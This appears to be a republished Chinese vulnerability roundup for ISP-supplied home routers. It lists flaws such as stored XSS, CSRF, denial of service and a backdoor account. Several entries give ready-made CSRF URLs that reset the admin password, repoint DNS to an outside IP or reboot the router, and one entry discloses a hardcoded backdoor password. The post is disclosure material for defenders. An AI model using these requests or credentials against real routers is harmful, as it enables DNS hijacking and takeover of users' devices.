路由器常见漏洞一览表

365bet平台总代 📅 2026-06-21 15:48:11 👤 admin 👁️ 7238 💥 130
路由器常见漏洞一览表

注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。

[TOC]

0x00 前言描述:路由器脆弱性披露网站http://routerpwn.com/ (不过貌似已经没有更新了)

0x01 漏洞一览路由器60多个没公开的漏洞厂商设备列表如下:

Observa Telecom AW4062Comtrend WAP-5813nComtrend CT-5365D-Link DSL-2750BBelkin F5D7632-4Sagem LiveBox Pro 2 SPAmper Xavi 7968 and 7968+Sagem Fast 1201Linksys WRT54GLObserva Telecom RTA01NObserva Telecom Home Station BHS-RTAObserva Telecom VH4032NHuawei HG553Huawei HG556aAstoria ARV7510Amper ASL-26555Comtrend AR-5387unNetgear CG3100DComtrend VG-8050Zyxel P 660HW-B1AComtrend 536+D-Link DIR-600每款路由器对应的主要漏洞类型有:

存储行xss:

#1, #2, #3, #6, #10, #12, #13,#14, #16, #17, #18, #19 and #20非认证xss访问:

#3, #7, #8, #9, #10, #14, #16,#17 and #19.CSRF 漏洞:

#1, #2, #3, #5, #10, #12, #13, #14,#15, #16, #18 and #20.DDOS漏洞:

#1, #5 and #10.提权漏洞:

#1信息泄漏:

#11后门

#10使用SMB符号链接绕过认证

#12USB设备绕过认证

#12, #13, #14 and #15认证绕过

#14

-即插即用相关漏洞:

#2, #3, #4, #5, #6,#7, #10, #11, #12, #13, #14, #16, #21 and #220x01 漏洞详细Observa Telecom型号: AW4062

测试的固件: 1.3.5.18 and 1.4.2 (latest)

注释:在西班牙isp于2012年广泛给adsl用户派发的路由器

漏洞描述:

存储型xss:

多个xss漏洞被发现于路由器的配置菜单项,可以让攻击者执行恶意代码

POC:在域名阻止的子目录的input字段没有做好相应的过滤,该功能主要用于阻止路由器访问制定的域名。然而domain的表单input字段允许攻击者输入js恶意脚本,当管理员每次访问该功能时,会触发存储型xss.

在防火墙/url阻断,防火墙/端口转发字段也有相应的漏洞。

csrf漏洞:

路由器的ping功能是通过GET传递,没有csrf token

http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88

修改密码:

http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22

DNS修改:

http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3=

权限提升:

当没有管理员权限的用户连接到路由器的FTP后,可以下载/etc/passwd和config.xml文件,其中config.xml存储路由器的明文配置信息,包括管理员用户的帐号。

拒绝服务:

可以通过csrf来实现远程路由器关机,当受害者打开这个页面后,路由器会在60秒内重启

http://192.168.1.1/goform/admin/formRebootComtrend型号: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033)

测试的固件: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one)

注释: 西班牙isp在2011年到2014年给FTTH用户广泛派发的路由器

漏洞描述:

存储型xss:

路由器的SSID可以输入恶意的js脚本,当管理员查看无线->安全功能和无线->MAC地址过滤功能时会触发

CSRF:

当请求这个连接的时候,会修改管理员密码为1234567890

http://192.168.1.1/password.cgi?adminPassword=1234567890

DNS修改:

http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1

UPNP弱认证导致可以修改防火墙规则:

可以通过UPNP请求,修改路由器的端口映射,以及中断WAN连接。

Belkin型号: F5D7632-4

测试的固件: 6.01.04

漏洞描述:

csrf:改变dns

代码语言:javascript复制http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252&dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89拒绝服务:通过下面的请求重启路由器

http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout="";

UPNP弱认证导致可以修改防火墙规则:可以通过UPNP请求,修改路由器的端口映射,以及中断WAN连接。

Linksys型号: WRT54GL

测试的固件: 4.30.16 build 6

漏洞描述:

非认证的xss:

攻击者只需发送一个DHCP的PDU请求,在请求中包含恶意的JS语句,当管理员查看路由器的状态->本地网络->DHCP客户端时会触发

Observa Telecom型号: RTA01N

固件测试: RTK_V2.2.13

漏洞描述:

存储型xss:

在DDNS的主机名输入列,输入恶意的js脚本,当管理员访问服务->DDNS时会触发

csrf:

当受害者访问此URL时,会修改DNS

http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicarcambios"

非认证的xss:

攻击者只需发送一个DHCP的PDU请求,在请求中包含恶意的JS语句,当管理员查看路由器的状态->本地网络->DHCP客户端时会触发

后门:admin用户的另一个帐号密码是7449airocon,可以通过路由器的备份功能,备份出xml文件,然后查看到。

UPNP弱认证导致可以修改防火墙规则:可以通过UPNP请求,修改路由器的端口映射,以及中断WAN连接。

Observa Telecom型号: VH4032N

测试固件: VH4032N_V0.2.35

注释: 沃达丰isp给他们客户最常见的路由器

漏洞描述:

存储型xss:

将SSID输入“‘;